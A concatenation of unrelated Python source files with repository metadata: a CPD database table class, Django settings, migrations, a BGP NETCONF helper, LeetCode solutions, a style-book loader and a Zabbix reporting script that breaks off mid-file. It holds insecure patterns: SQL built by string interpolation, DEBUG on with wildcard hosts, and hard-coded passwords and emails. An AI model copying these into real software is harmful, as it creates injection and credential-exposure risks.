        core_cpd_module varchar(256),
        description varchar(512),
        learning_objectives varchar(512),
        reflective_comments varchar(512),
        attached_files varchar(512),
        web_links varchar(512)

    NOTE(review): SQL strings are built by direct interpolation throughout
    this class — consider switching to parameterised queries.

    Fixes applied: ``get_id`` queried the ``payment`` table, ``select``
    concatenated a stray literal ``%s`` into the column list, ``selectcolstr``
    contained a dead ``SqlSelectBuilder()`` assignment, and the
    ``reflective_comments`` argument was accepted but silently dropped by
    add/update/singlewhere/selectcolstr.
    """
    db_path = ""

    # Indices of the columns in a fetched row.
    IDX_CPD_ID = 0
    IDX_TITLE = 1
    IDX_DATE_STARTED = 2
    IDX_DAYS_TAKEN = 3
    IDX_ACTIVITY_TYPE = 4
    IDX_CATEGORY = 5
    IDX_CORE_CPD_MODULE = 6
    IDX_DISCRIPTION = 7
    IDX_LEARNING_OBJECTIVES = 8
    IDX_REFLECTIVE_COMMENTS = 9
    IDX_ATTACHED_FILES = 10
    IDX_WEB_LINKS = 11

    @staticmethod
    def SetConfig(path):
        """Remember the database file location for later connections."""
        CPDTable.db_path = path

    def add(self,
            title=None,
            date_started=None,
            days_taken=None,
            activity_type=None,
            category=None,
            core_cpd_module=None,
            description=None,
            learning_objectives=None,
            reflective_comments=None,
            attached_files=None,
            web_links=None,
            ):
        """Insert a new cpd row; fields left as None are omitted."""
        builder = SqlInsertBuilder()
        builder.addfield(title, "title")
        builder.addfield(date_started, "date_started")
        builder.addfield(days_taken, "days_taken")
        builder.addfield(activity_type, "activity_type")
        builder.addfield(category, "category")
        builder.addfield(core_cpd_module, "core_cpd_module")
        builder.addfield(description, "description")
        builder.addfield(learning_objectives, "learning_objectives")
        # fix: reflective_comments was accepted but never written
        builder.addfield(reflective_comments, "reflective_comments")
        builder.addfield(attached_files, "attached_files")
        builder.addfield(web_links, "web_links")
        select = 'insert into cpd (' + builder.getTokenString() + ') values (' + builder.getValueString() + ');'
        self.execcmd(select)

    def update(self, cpd_id,
               title=None,
               date_started=None,
               days_taken=None,
               activity_type=None,
               category=None,
               core_cpd_module=None,
               description=None,
               learning_objectives=None,
               reflective_comments=None,
               attached_files=None,
               web_links=None,
               ):
        """Update the row identified by *cpd_id*; None fields are left out."""
        builder = SqlUpdateBuilder()
        # NOTE(review): cpd_id is also fed into the SET list, mirroring the
        # original behaviour — confirm SqlUpdateBuilder handles this as intended.
        builder.addfield(cpd_id, "cpd_id")
        builder.addfield(title, "title")
        builder.addfield(date_started, "date_started")
        builder.addfield(days_taken, "days_taken")
        builder.addfield(activity_type, "activity_type")
        builder.addfield(category, "category")
        builder.addfield(core_cpd_module, "core_cpd_module")
        builder.addfield(description, "description")
        builder.addfield(learning_objectives, "learning_objectives")
        # fix: reflective_comments was accepted but never written
        builder.addfield(reflective_comments, "reflective_comments")
        builder.addfield(attached_files, "attached_files")
        builder.addfield(web_links, "web_links")
        select = 'update cpd set ' + builder.getValueString() + ' where cpd_id = \'%s\' ' % cpd_id + ';'
        self.execcmd(select)

    def singlewhere(self,
                    cpd_id=None,
                    title=None,
                    date_started=None,
                    days_taken=None,
                    activity_type=None,
                    category=None,
                    core_cpd_module=None,
                    description=None,
                    learning_objectives=None,
                    reflective_comments=None,
                    attached_files=None,
                    web_links=None,
                    ):
        """Build a single-column WHERE fragment from the one non-None field."""
        builder = SqlSingleWhereBuilder()
        builder.addfield(cpd_id, "cpd_id")
        builder.addfield(title, "title")
        builder.addfield(date_started, "date_started")
        builder.addfield(days_taken, "days_taken")
        builder.addfield(activity_type, "activity_type")
        builder.addfield(category, "category")
        builder.addfield(core_cpd_module, "core_cpd_module")
        builder.addfield(description, "description")
        builder.addfield(learning_objectives, "learning_objectives")
        # fix: reflective_comments was accepted but never written
        builder.addfield(reflective_comments, "reflective_comments")
        builder.addfield(attached_files, "attached_files")
        builder.addfield(web_links, "web_links")
        return builder.getValueString()

    def selectcolstr(self,
                     cpd_id=None,
                     title=None,
                     date_started=None,
                     days_taken=None,
                     activity_type=None,
                     category=None,
                     core_cpd_module=None,
                     description=None,
                     learning_objectives=None,
                     reflective_comments=None,
                     attached_files=None,
                     web_links=None,
                     ):
        """Build the column list for a SELECT from the non-None arguments.

        NOTE(review): a dead ``SqlSelectBuilder()`` assignment was removed;
        the original immediately overwrote it with SqlSingleWhereBuilder,
        whose behaviour is preserved here — confirm which builder was intended.
        """
        builder = SqlSingleWhereBuilder()
        builder.addfield(cpd_id, "cpd_id")
        builder.addfield(title, "title")
        builder.addfield(date_started, "date_started")
        builder.addfield(days_taken, "days_taken")
        builder.addfield(activity_type, "activity_type")
        builder.addfield(category, "category")
        builder.addfield(core_cpd_module, "core_cpd_module")
        builder.addfield(description, "description")
        builder.addfield(learning_objectives, "learning_objectives")
        # fix: reflective_comments was accepted but never written
        builder.addfield(reflective_comments, "reflective_comments")
        builder.addfield(attached_files, "attached_files")
        builder.addfield(web_links, "web_links")
        return builder.tostr()

    def selectcols(self, payment_id=False,
                   cpd_id=False,
                   date_started=False,
                   days_taken=False,
                   activity_type=False,
                   category=False,
                   core_cpd_module=False,
                   description=False,
                   learning_objectives=False,
                   reflective_comments=False,
                   attached_files=False,
                   web_links=False
                   ):
        """Select the flagged columns from every cpd row.

        NOTE(review): this signature does not line up with selectcolstr —
        it has a stray ``payment_id`` and no ``title``, so the positional
        mapping below is shifted by one.  Kept as-is to avoid breaking
        existing keyword callers; reconcile the two signatures.
        """
        selectstr = self.selectcolstr(payment_id,
                                      cpd_id,
                                      date_started,
                                      days_taken,
                                      activity_type,
                                      category,
                                      core_cpd_module,
                                      description,
                                      learning_objectives,
                                      reflective_comments,
                                      attached_files,
                                      web_links
                                      )
        if selectstr == None:
            select = 'select * from cpd;'
        else:
            select = 'select ' + selectstr + ' from cpd;'
        return self.execfetchall(select)

    # obsolete — kept for existing callers; fixed the stray '%s' that used
    # to be concatenated into the column list
    def select(self, selectStr, whereStr):
        select = 'select ' + selectStr + ' from cpd where %s ' % whereStr + ';'
        return self.execfetchone(select)

    def selectone(self, selectStr=None, whereStr=None):
        """Fetch the first cpd row matching the optional column/where parts."""
        select = self._selectstr('cpd', selectStr, whereStr)
        return self.execfetchone(select)

    def selectall(self, selectStr=None, whereStr=None):
        """Fetch all cpd rows matching the optional column/where parts."""
        select = self._selectstr('cpd', selectStr, whereStr)
        return self.execfetchall(select)

    def deleteall(self):
        """Remove every row from the cpd table."""
        self._deleteall('cpd')

    def get_id(self, cpd_id):
        """Return the matching cpd_id, if present.

        Fix: the original queried the ``payment`` table instead of ``cpd``.
        """
        select = 'select cpd_id from cpd where cpd_id = \'%s\' ' % cpd_id + ';'
        return self.execfetchone(select)

    def remove(self, idx):
        """Delete the row whose cpd_id equals *idx*."""
        self._remove('cpd', 'cpd_id', idx)

    def showAll(self):
        """Return a printable dump of the whole table."""
        return self._showAll('cpd')

    def showItem(self, pid):
        """Return a printable dump of one row by cpd_id."""
        return self._showItem('cpd', 'cpd_id', pid)

    def getItem(self, idx, data):
        """Extract column *idx* (one of the IDX_* constants) from row *data*."""
        return data[idx]
| [
"i.ferguson@idk.co.uk"
] | i.ferguson@idk.co.uk |
e31a886196bc0432da6784ea706d7553fc4bdc56 | cce3c60cab11c5744a7aead41fa62f2d4b4f7624 | /blog/blog/settings.py | 86d7e251dac8932a3fe2369c12d3fabd6c268e97 | [] | no_license | Krushel/latest_blog | 29e00f4f70a2e86a343e74dcc10f0c1be2a1e282 | c9430e5d3b5110e372620ad5b104b600605e855d | refs/heads/main | 2023-03-07T13:28:56.615062 | 2021-02-18T17:24:49 | 2021-02-18T17:24:49 | 340,168,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,672 | py | """
Django settings for blog project.
Generated by 'django-admin startproject' using Django 3.1.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os

# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this placeholder value must be replaced (e.g. read from an
# environment variable) before any real deployment.
SECRET_KEY = 'uf'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = ['*']

STATICFILES_DIRS = [
    BASE_DIR / "static"
]

# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'corsheaders',
    'api'
]

# Fix: CorsMiddleware must be placed as high as possible — in particular
# before CommonMiddleware (django-cors-headers documentation).  The previous
# list had it last and also registered CommonMiddleware twice.
MIDDLEWARE = [
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'blog.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            os.path.join(BASE_DIR, 'templates')
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'blog.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# NOTE(review): credentials are hard-coded for the docker-compose dev setup.

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': 'postgres',
        'USER': 'postgres',
        'PASSWORD': 'postgres',
        'HOST': 'db',
        'PORT': 5432,
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/

STATIC_URL = '/static/'

REST_FRAMEWORK = {
    'DEFAULT_RENDERER_CLASSES': (
        'rest_framework.renderers.JSONRenderer',
    )
}

CORS_ALLOWED_ORIGINS = [
    "https://example.com",
    "https://sub.example.com",
    "http://localhost:3000",
    "http://127.0.0.1:5000",
    "http://127.0.0.1:8000"
]
LOGIN_REDIRECT_URL = "/" | [
"you@example.com"
] | you@example.com |
047b5e5d2ea0b028059c1b2434d27f5f430e8434 | bb7668267448d1895c423566aa575b22274efde2 | /blog/migrations/0006_auto_20171016_2003.py | fa99817019f7a4d9f462cc929f5e7d982d21c365 | [] | no_license | StarfishM/my-first-blog | 1b7dd3931d50d3bd8c7d532180a4f63918bc5023 | 3fdc056fb4870945052356996017b0e374f6374d | refs/heads/master | 2022-12-10T12:24:40.143317 | 2021-10-07T07:59:06 | 2021-10-07T07:59:06 | 94,611,553 | 1 | 0 | null | 2022-11-22T08:48:33 | 2017-06-17T08:45:06 | Python | UTF-8 | Python | false | false | 535 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-10-16 18:03
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Replace the standalone Image model with an ImageField on Post."""

    dependencies = [
        ('blog', '0005_auto_20171003_1533'),
    ]

    operations = [
        migrations.DeleteModel(
            name='Image',
        ),
        migrations.AddField(
            model_name='post',
            name='image',
            # uploads land under MEDIA_ROOT/img/<year>/<month>/<day>
            field=models.ImageField(null=True, upload_to='img/%Y/%m/%d'),
        ),
    ]
| [
"merle_canada@hotmail.com"
] | merle_canada@hotmail.com |
b9e12fcfc6617d10fd565872dc8e1f110eeda0c9 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-4/3a3c6d0f9a04487b037a1650614a3ee8ee4f3333-<delete_bgp_enable_other>-bug.py | b2fc202f8d6ad8f8f0834a1cf56ec6ee2eb7ce9a | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,218 | py | def delete_bgp_enable_other(self, **kwargs):
    """Reset optional BGP "enable" settings back to their defaults via NETCONF.

    For every module parameter that is set (or not 'no_use'), appends the
    matching XML element to the merge payload and records the equivalent
    CLI command for change reporting, then pushes the whole config.

    Returns the list of recorded CLI commands; calls module.fail_json()
    if the device does not answer with <ok/>.

    NOTE(review): the CE_MERGE_BGP_ENABLE_HEADER/TAIL constants and
    netconf_set_config() are defined outside this chunk -- behavior of the
    payload itself cannot be verified from here.
    """
    module = kwargs['module']
    conf_str = CE_MERGE_BGP_ENABLE_HEADER
    cmds = []
    # graceful-restart on/off (tri-state string: 'true'/'false'/'no_use').
    graceful_restart = module.params['graceful_restart']
    if (graceful_restart != 'no_use'):
        conf_str += ('<gracefulRestart>%s</gracefulRestart>' % graceful_restart)
        if (graceful_restart == 'true'):
            cmd = 'graceful-restart'
        else:
            cmd = 'undo graceful-restart'
        cmds.append(cmd)
    # Timers/limits below are reset to fixed defaults (600 / 255) when set.
    time_wait_for_rib = module.params['time_wait_for_rib']
    if time_wait_for_rib:
        conf_str += '<timeWaitForRib>600</timeWaitForRib>'
        cmd = 'undo graceful-restart timer wait-for-rib'
        cmds.append(cmd)
    as_path_limit = module.params['as_path_limit']
    if as_path_limit:
        conf_str += '<asPathLimit>255</asPathLimit>'
        cmd = 'undo as-path-limit'
        cmds.append(cmd)
    check_first_as = module.params['check_first_as']
    if (check_first_as != 'no_use'):
        conf_str += ('<checkFirstAs>%s</checkFirstAs>' % check_first_as)
        if (check_first_as == 'true'):
            cmd = 'check-first-as'
        else:
            cmd = 'undo check-first-as'
        cmds.append(cmd)
    # Confederation id is cleared by sending an empty element.
    confed_id_number = module.params['confed_id_number']
    if confed_id_number:
        conf_str += '<confedIdNumber></confedIdNumber>'
        cmd = 'undo confederation id'
        cmds.append(cmd)
    confed_nonstanded = module.params['confed_nonstanded']
    if (confed_nonstanded != 'no_use'):
        conf_str += ('<confedNonstanded>%s</confedNonstanded>' % confed_nonstanded)
        if (confed_nonstanded == 'true'):
            cmd = 'confederation nonstandard'
        else:
            cmd = 'undo confederation nonstandard'
        cmds.append(cmd)
    bgp_rid_auto_sel = module.params['bgp_rid_auto_sel']
    if (bgp_rid_auto_sel != 'no_use'):
        conf_str += ('<bgpRidAutoSel>%s</bgpRidAutoSel>' % bgp_rid_auto_sel)
        if (bgp_rid_auto_sel == 'true'):
            cmd = 'router-id vpn-instance auto-select'
        else:
            cmd = 'undo router-id'
        cmds.append(cmd)
    keep_all_routes = module.params['keep_all_routes']
    if (keep_all_routes != 'no_use'):
        conf_str += ('<keepAllRoutes>%s</keepAllRoutes>' % keep_all_routes)
        if (keep_all_routes == 'true'):
            cmd = 'keep-all-routes'
        else:
            cmd = 'undo keep-all-routes'
        cmds.append(cmd)
    memory_limit = module.params['memory_limit']
    if (memory_limit != 'no_use'):
        conf_str += ('<memoryLimit>%s</memoryLimit>' % memory_limit)
        if (memory_limit == 'true'):
            cmd = 'prefix memory-limit'
        else:
            cmd = 'undo prefix memory-limit'
        cmds.append(cmd)
    gr_peer_reset = module.params['gr_peer_reset']
    if (gr_peer_reset != 'no_use'):
        conf_str += ('<grPeerReset>%s</grPeerReset>' % gr_peer_reset)
        if (gr_peer_reset == 'true'):
            cmd = 'graceful-restart peer-reset'
        else:
            cmd = 'undo graceful-restart peer-reset'
        cmds.append(cmd)
    is_shutdown = module.params['is_shutdown']
    if (is_shutdown != 'no_use'):
        conf_str += ('<isShutdown>%s</isShutdown>' % is_shutdown)
        if (is_shutdown == 'true'):
            cmd = 'shutdown'
        else:
            cmd = 'undo shutdown'
        cmds.append(cmd)
    # Next-hop recursive-lookup restrain timers: one combined CLI command,
    # but each interval resets its own XML element to the default value.
    suppress_interval = module.params['suppress_interval']
    hold_interval = module.params['hold_interval']
    clear_interval = module.params['clear_interval']
    if suppress_interval:
        conf_str += '<suppressInterval>60</suppressInterval>'
        cmd = ('nexthop recursive-lookup restrain suppress-interval %s hold-interval %s clear-interval %s' % (suppress_interval, hold_interval, clear_interval))
        cmds.append(cmd)
    if hold_interval:
        conf_str += '<holdInterval>120</holdInterval>'
    if clear_interval:
        conf_str += '<clearInterval>600</clearInterval>'
    conf_str += CE_MERGE_BGP_ENABLE_TAIL
    # Push the assembled payload; the device must acknowledge with <ok/>.
    recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
    if ('<ok/>' not in recv_xml):
        module.fail_json(msg='Error: Delete bgp enable failed.')
    return cmds
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
f74b0d79e2bf2d6c54a8a643b589882dd4d66d2b | 69b93223fc6794123269022a02e5a1dcf130e698 | /33_Search_in_Rotated_Sorted_Array.py | a01f3848cc0f6ca429274d4d6cc6745238e32674 | [] | no_license | GuangyuZheng/leet_code_python | 43b984ce98cc889a7e07151004d347cb03b2d9b2 | 266def94df8245f90ea5b6885fc472470b189e51 | refs/heads/master | 2020-09-05T18:12:07.649374 | 2020-02-22T09:37:59 | 2020-02-22T09:37:59 | 220,177,486 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,504 | py | from typing import List
class Solution:
    """LeetCode 33 (search in rotated sorted array), two-phase approach:
    first locate the rotation pivot with a binary search, then binary
    search over the virtually "unrotated" array."""
    def search(self, nums: List[int], target: int) -> int:
        """Return the index of target in the rotated array, or -1."""
        # find pivot
        if len(nums) == 0:
            return -1
        if nums[0] <= nums[len(nums) - 1]:
            # First element <= last element: array is not rotated at all.
            pivot = 0
        else:
            left = 0
            right = len(nums) - 1
            while left <= right:
                mid = (left + right) // 2
                if nums[mid] > nums[mid + 1]:
                    # mid is the last element of the ascending left run,
                    # so the minimum (pivot) sits at mid + 1.
                    break
                else:
                    if nums[mid] >= nums[left]:
                        left = mid + 1
                    else:
                        right = mid - 1
            # On break, (left + right) // 2 == mid, so pivot == mid + 1.
            pivot = (left + right) // 2 + 1
        # Second binary search on virtual indices: tmid maps a position in
        # the sorted view back into the rotated array.
        vleft, vright = 0, len(nums) - 1
        while vleft <= vright:
            vmid = (vleft + vright) // 2
            tmid = (vmid + pivot) % len(nums)
            if nums[tmid] == target:
                return tmid
            elif nums[tmid] < target:
                vleft = vmid+1
            else:
                vright = vmid-1
        return -1
# Treat the rotated array as two sorted arrays glued together.
class SolutionV2:
    """LeetCode 33 variant: one binary search where probes from the
    "wrong" half are mapped to +/- infinity sentinels."""

    def search(self, nums: List[int], target: int) -> int:
        """Return the index of target in the rotated sorted array, or -1.

        nums[0] decides which half a value belongs to: values >= nums[0]
        are in the left (pre-rotation) part, the rest in the right part.
        """
        n = len(nums)
        lo, hi = 0, n - 1
        while lo <= hi:
            mid = (lo + hi) // 2
            if (target >= nums[0]) == (nums[mid] >= nums[0]):
                # Probe and target sit in the same sorted half: compare directly.
                num = nums[mid]
            elif target < nums[0]:
                # Target is in the right (smaller) half but the probe is in
                # the left one; treat the probe as -inf so the search moves right.
                num = float("-inf")
            else:
                # Target in the left half, probe in the right: treat as +inf.
                # (The original used the magic sentinel 10e10 == 1e11, which
                # silently returns -1 for valid targets larger than 1e11.)
                num = float("inf")
            if num > target:
                hi = mid - 1
            elif num < target:
                lo = mid + 1
            else:
                return mid
        return -1
# Splitting the rotated array at mid leaves at least one sorted half,
# e.g. [4 5 6 7 1 2 3] -> [4 5 6 7] and [7 1 2 3]. Each step decides
# which half is sorted and discards the half that cannot hold target.
class SolutionV3:
    """Single binary search over the rotated array (LeetCode 33)."""

    def search(self, nums: List[int], target: int) -> int:
        """Return the index of target in nums, or -1 when absent."""
        lo, hi = 0, len(nums) - 1
        while lo <= hi:
            mid = (lo + hi) // 2
            probe = nums[mid]
            if probe == target:
                return mid
            if nums[lo] <= probe:
                # Left half nums[lo..mid] is sorted.
                if nums[lo] <= target < probe:
                    hi = mid - 1
                else:
                    lo = mid + 1
            elif probe < target <= nums[hi]:
                # Right half nums[mid..hi] is sorted and contains target.
                lo = mid + 1
            else:
                hi = mid - 1
        return -1
| [
"583621555@qq.com"
] | 583621555@qq.com |
d2cf5b52e5287415b08b947c096c0b6e4e4c85de | 204454f01c125c4364615f2a6ee80d9a781b2524 | /pyliter/style_book.py | 2b0b92a504be4dd7b2e65440181fd6a660ae6e18 | [
"Apache-2.0"
] | permissive | JnyJny/pyliter | d18e49f607fbd835f8b3b273c8bf1ae7fa57876f | e2e5f170b21c26bed4c3c0b3a83c8fabbc89430f | refs/heads/master | 2021-07-12T02:48:42.440944 | 2021-07-07T16:25:29 | 2021-07-07T16:25:29 | 227,500,321 | 11 | 0 | Apache-2.0 | 2020-01-27T20:13:00 | 2019-12-12T02:10:34 | Python | UTF-8 | Python | false | false | 3,656 | py | """style container
"""
import importlib.resources
import yaml
from pathlib import Path
from webcolors import name_to_rgb, hex_to_rgb
from . import resources
class StyleBook(dict):
    """Mapping of style-category names to attribute dictionaries.

    Style books are loaded from YAML files; validate() normalizes every
    color-valued attribute into an (R, G, B, A) tuple. A "DEFAULT"
    category is required.
    """
    @classmethod
    def available_styles(cls) -> list:
        """Return a list of available style books by name."""
        styles = []
        for filename in importlib.resources.contents(resources):
            path = Path(filename)
            if path.match("*_style.yaml"):
                styles.append(path.stem.replace("_style", ""))
        styles.sort()
        return styles
    @classmethod
    def from_any(cls, stylespec: str):
        """Returns a configured StyleBook. First it attempts to load
        a StyleBook from stylespec interpreted as a filesystem path.
        If no file is found, the method next tries to load a StyleBook
        using stylespec as a style name (see `available_styles`).
        If both of those fail, ValueError is raised.

        :param str stylespec: path or style name
        """
        try:
            return cls.from_filename(stylespec)
        except FileNotFoundError:
            pass
        try:
            return cls.by_name(stylespec)
        except FileNotFoundError:
            pass
        raise ValueError(f"unable to find a style matching '{stylespec}'")
    @classmethod
    def by_name(cls, style_name: str):
        """Return a StyleBook initialized with the contents of the
        resource file identified by 'style_name'.

        :param str style_name:
        """
        with importlib.resources.path(resources, f"{style_name}_style.yaml") as path:
            return cls.from_filename(path)
    @classmethod
    def from_filename(cls, filename: str):
        """Return a StyleBook initialized with the contents of the given filename.

        :param str filename:
        """
        path = Path(filename)
        return cls(yaml.safe_load(path.read_text()))
    @classmethod
    def template(cls) -> dict:
        """Not implemented yet: intended to return a skeleton style dict."""
        pass
    def __init__(self, styles: dict, name: str = None):
        """
        :param dict styles: dictionary of dictionaries
        :param str name: optional display name for this style book
        """
        self.name = name
        self.update(styles)
        self.validate()
    def validate(self) -> bool:
        """Require a DEFAULT category and normalize color attributes.

        Each color value (hex string or CSS color name) is converted into
        an (R, G, B, 255) tuple. Raises ValueError on a missing DEFAULT
        category or an unparsable color specification.
        """
        if "DEFAULT" not in self:
            raise ValueError("Missing DEFAULT style.")
        for category, attributes in self.items():
            for color_key in ["color", "background_color", "underline"]:
                try:
                    color_spec = attributes[color_key]
                    try:
                        color = hex_to_rgb(color_spec)
                    except ValueError:
                        color = name_to_rgb(color_spec)
                    # RGBA channel order. The original stored
                    # (red, blue, green, 255), swapping green and blue.
                    attributes[color_key] = (color.red, color.green, color.blue, 255)
                except KeyError:
                    # Attribute absent for this category: nothing to normalize.
                    pass
                except ValueError as error:
                    raise error from None
        return True
    def get(self, key: str) -> dict:
        """Returns a dictionary for the given key ({} when missing)."""
        return super().get(key, {})
    def __str__(self):
        """YAML formatted string."""
        return yaml.safe_dump(dict(self), sort_keys=False)
    def save(self, path):
        """Save the contents of this StyleBook to path in YAML format."""
        # Context manager so the handle is flushed and closed even on error
        # (the original passed an unclosed open() result to safe_dump).
        with open(path, "w") as fp:
            yaml.safe_dump(dict(self), fp, sort_keys=False)
    @property
    def default(self):
        """Returns the DEFAULT style category dictionary."""
        return self.get("DEFAULT")
    @property
    def categories(self):
        """List of style category names."""
        return list(self.keys())
| [
"erik.oshaughnessy@gmail.com"
] | erik.oshaughnessy@gmail.com |
4a3aa025bd2897ef867e95629f701e734f714181 | 3a67c039c6c70d7317bb695212566011ce8f5c5f | /migrations/versions/ee6b7b2e6a16_.py | a162ffc2bda764d510c69f3407cc583388346309 | [] | no_license | joonaojapalo/trackem | 3f7a0376f2e0059aca9c45f1bc4a812252028e9a | 8ae80f1b1045195f4ae9a31cf9c802b4eda6e684 | refs/heads/master | 2020-05-05T12:05:43.447284 | 2019-04-07T19:41:57 | 2019-04-07T19:41:57 | 180,013,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | """empty message
Revision ID: ee6b7b2e6a16
Revises: 28f62b6e1f24
Create Date: 2016-03-01 11:46:58.147000
"""
# revision identifiers, used by Alembic.
revision = 'ee6b7b2e6a16'
down_revision = '28f62b6e1f24'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects.postgresql import ENUM  # NOTE(review): imported but unused below
# enum type
# Shared Enum instance so upgrade() and downgrade() create/drop the same
# PostgreSQL type ("status_enum").
user_status_enum = sa.Enum('new', 'confirmed', 'deleted', name="status_enum")
def upgrade():
    """Create the status_enum type and add the NOT NULL user.status column."""
    # create new type
    # The enum type must exist in PostgreSQL before a column can use it.
    user_status_enum.create(op.get_bind())
    ### commands auto generated by Alembic - please adjust! ###
    # NOTE(review): nullable=False with no server_default fails on a table
    # that already contains rows -- presumably "user" was empty here.
    op.add_column('user', sa.Column('status', user_status_enum, nullable=False))
    ### end Alembic commands ###
def downgrade():
    """Reverse upgrade(): drop user.status, then drop the enum type."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('user', 'status')
    ### end Alembic commands ###
    # drop type
    # The type can only be dropped once no column references it.
    user_status_enum.drop(op.get_bind())
| [
"joona_ojapalo@hotmail.com"
] | joona_ojapalo@hotmail.com |
b45cb7f4d47b76c54fca5a37745168c87224cc22 | 2a9f992afa89b3afbc8e838acebba662833da409 | /Assignment 1/a1test.py | 4ac250f72df09e8e2c5d1825188475f03e9e73cc | [] | no_license | simrit1/cs1110_python | 67fe5fc79d28c3dbdc5990be960153225a144d50 | d39f52eddc4eb60153f738761fc2210e72f60326 | refs/heads/master | 2022-09-05T05:44:23.431343 | 2020-05-26T04:33:29 | 2020-05-26T04:33:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | # Test a1
# Caitlin Stanton (cs968), Andrew Denkewicz(ajd248)
# 09/10/2016
"""Unit test for module a1
When run as a script, this module invokes several procedures that
test the various functions in the module a1."""
import cornelltest
import a1
def testA():
    """Test before_space: returns the text before the first space."""
    s = "125 dollars"
    # Both helpers live in modules imported with plain "import", so they
    # must be qualified; the original bare assert_equals/before_space
    # calls raised NameError.
    cornelltest.assert_equals("125", a1.before_space(s))
def testB():
    """Test stub -- no assertions implemented yet."""
    pass
def testC():
    """Test stub -- no assertions implemented yet."""
    pass
def testD():
    """Test stub -- no assertions implemented yet."""
    pass
# Run every test procedure in order; the success message below is only
# reached if none of them raised (Python 2 print statement).
testA()
testB()
testC()
testD()
print "Module a1 passed all tests"
"caitlinstanton44@gmail.com"
] | caitlinstanton44@gmail.com |
cabbd058d2288ed0cdd37e5cf0eaacab14b38ae4 | 92500c3acff59c68d5d30f47ec86d73c6fc5b69a | /zabbix_api/zabbix_report.py | 54ec3d3addac13b4f56dcb35cb4d7724739ad2f2 | [] | no_license | Fangzhongpeng/zabbix_api | 68b4ee46aab75ea6de1c6b338a9e8dfd2b00239c | 990ea43c4c1bccd044daae11da8c36864f9cc489 | refs/heads/master | 2023-06-25T01:23:02.145174 | 2023-06-08T03:30:43 | 2023-06-08T03:30:43 | 299,521,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,195 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import json
import urllib2
from urllib2 import URLError
import sys
import zabbix_sendmail
import sys
import datetime
# Python 2 only: re-expose setdefaultencoding so the UTF-8 strings in the
# HTML report can be handled without codec errors.
reload(sys)
sys.setdefaultencoding('utf8')
# Mail recipients of the alert report.
mailtolist = ['fangzhongpeng9@163.com','fangzhongpeng@iqingka.com' ]
# Format: zabbix URL, zabbix account, zabbix password, mail subject.
zabbix_addresses = ['http://zabbix.qkvoice.com,Admin,zabbix,今日告警统计']
# Timestamp (YYYY-MM-DD HH:MM:SS) rendered into the report heading.
now_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
class ZabbixTools:
def __init__(self, address, username, password):
self.address = address
self.username = username
self.password = password
self.url = '%s/api_jsonrpc.php' % self.address
self.header = {"Content-Type": "application/json"} #声明消息体的字段类型
def user_login(self):
data = json.dumps({
"jsonrpc": "2.0",
"method": "user.login",
"params": {
"user": self.username,
"password": self.password
},
"id": 0
})
request = urllib2.Request(self.url, data)
for key in self.header:
request.add_header(key, self.header[key])
try:
result = urllib2.urlopen(request)
except URLError as e:
print "Auth Failed, please Check your name and password:", e.code
else:
response = json.loads(result.read())
result.close()
# print response['result']
self.authID = response['result']
return self.authID
def trigger_get(self):
